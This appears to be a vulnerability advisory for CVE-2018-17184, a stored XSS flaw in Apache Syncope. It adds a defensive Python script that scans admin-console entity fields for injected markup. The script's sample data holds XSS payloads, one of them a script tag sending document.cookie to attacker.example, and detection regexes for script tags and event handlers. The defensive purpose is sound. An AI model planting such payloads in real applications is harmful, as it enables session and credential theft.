CVE-2018-17184
Stored cross-site scripting (XSS) in Apache syncope-core
5.4
MEDIUM
CVSS 3.0
EPSS 1.0%
Description
A malicious user with sufficient administration entitlements can inject HTML-like elements containing JavaScript into Connector names, Report names, AnyTypeClass keys and Policy descriptions. When another user with sufficient administration entitlements later edits one of these entities via the Admin Console, the injected JavaScript executes in that user's browser (stored cross-site scripting). Because the payload is persisted server-side, the attack only requires that a second, possibly more privileged, administrator open the edit form.
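An administrator who cannot upgrade immediately will want to know whether any of the four field kinds named above already carry injected markup. The following audit script is an added example and not part of the advisory or of Apache Syncope itself. The REST paths and JSON attribute names in `FIELDS`, the use of HTTP Basic authentication and the `X-Syncope-Domain` header in `fetch_entities()` are assumptions about the Syncope 2.0 API; the entity lists in `SAMPLE` are constructed for demonstration so the scan runs offline.

```python
"""Audit Apache Syncope entity fields for stored HTML/JavaScript (CVE-2018-17184).

Added example, not Syncope's own code. It scans the four field kinds named in
the advisory (Connector names, Report names, AnyTypeClass keys and Policy
descriptions) for HTML-like markup, inline event handlers or javascript: URLs.
REST paths and attribute names below are assumptions about the Syncope 2.0
REST API, not taken from the advisory.
"""
import json
import re
import urllib.request
from base64 import b64encode

# entity kind -> (assumed REST path, assumed JSON attribute holding the text).
# Only ACCOUNT policies are listed; PASSWORD, PULL and PUSH policies are assumed
# to live under the same path with a different type suffix.
FIELDS = {
    "connector": ("/syncope/rest/connectors", "displayName"),
    "report": ("/syncope/rest/reports", "name"),
    "anyTypeClass": ("/syncope/rest/anyTypeClasses", "key"),
    "policy": ("/syncope/rest/policies/ACCOUNT", "description"),
}

# Heuristics for "this is markup, not a name": any HTML-like tag, an inline
# on*= event-handler attribute, or a javascript: URL scheme.
_MARKUP = re.compile(
    r"<\s*/?\s*[a-z][^>]*>"   # e.g. <script>, <img ...>, <svg/onload=...>
    r"|\bon[a-z]+\s*=",       # e.g. onerror=, onload=
    re.IGNORECASE,
)
_JS_URL = re.compile(r"javascript\s*:", re.IGNORECASE)

# Constructed sample data: one clean and one tainted entity per kind.
SAMPLE = {
    "connector": [
        {"key": "c1", "displayName": "LDAP production"},
        {"key": "c2", "displayName": "CSV <img src=x onerror=alert(document.cookie)>"},
    ],
    "report": [
        {"key": "r1", "name": "Weekly audit"},
        {"key": "r2", "name": "Stats <script>fetch('https://attacker.example/'+document.cookie)</script>"},
    ],
    "anyTypeClass": [
        {"key": "BaseUser"},
        {"key": "<svg/onload=alert(1)>"},
    ],
    "policy": [
        {"key": "p1", "description": "Lock after 5 failures"},
        {"key": "p2", "description": 'Click <a href="javascript:alert(1)">here</a> for details'},
    ],
}


def find_injected_markup(kind, entities):
    """Return (kind, entity key, field, value) for every entity of `kind`
    whose audited field contains markup or script. `entities` is the decoded
    JSON list returned by the REST endpoint for that kind."""
    _, field = FIELDS[kind]
    findings = []
    for entity in entities:
        value = entity.get(field)
        if isinstance(value, str) and (_MARKUP.search(value) or _JS_URL.search(value)):
            findings.append((kind, entity.get("key"), field, value))
    return findings


def audit_all(entities_by_kind):
    """Run find_injected_markup over a {kind: [entities]} mapping."""
    findings = []
    for kind, entities in entities_by_kind.items():
        findings.extend(find_injected_markup(kind, entities))
    return findings


def fetch_entities(base_url, kind, user, password, domain="Master"):
    """Fetch the entity list for `kind` from a live instance.

    Assumes HTTP Basic authentication against the assumed REST path and that
    the X-Syncope-Domain header selects the domain; adjust for your deployment.
    Not called by the offline demonstration below."""
    path, _ = FIELDS[kind]
    request = urllib.request.Request(base_url.rstrip("/") + path)
    token = b64encode(f"{user}:{password}".encode()).decode()
    request.add_header("Authorization", "Basic " + token)
    request.add_header("Accept", "application/json")
    request.add_header("X-Syncope-Domain", domain)
    with urllib.request.urlopen(request, timeout=30) as response:
        return json.load(response)


if __name__ == "__main__":
    for kind, key, field, value in audit_all(SAMPLE):
        print(f"{kind} {key!r}: {field} contains markup: {value!r}")
```

Against a live instance, replace `SAMPLE` with `{kind: fetch_entities(url, kind, user, password) for kind in FIELDS}`. Treat every hit as a payload to remove through the REST API rather than through the Admin Console, since opening the affected edit form is exactly what triggers the injected script on an unpatched instance.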
How to fix CVE-2018-17184
To remediate CVE-2018-17184, upgrade the affected package to a fixed version:
- upgrade syncope-core to 2.0.11 or later
Is CVE-2018-17184 being exploited?
Low. The EPSS score of 1.0% is an estimated probability of exploitation in the wild over the next 30 days, not a record of observed attacks; a score this low indicates no widespread exploitation activity for this CVE.
Affected packages (1)
- syncope-core: all versions before 2.0.11 (from 0, < 2.0.11)
CVSS scores
| Source | Version | Severity | Score | Vector |
|---|---|---|---|---|
| osv | CVSS 3.0 | MEDIUM | 5.4 | CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N |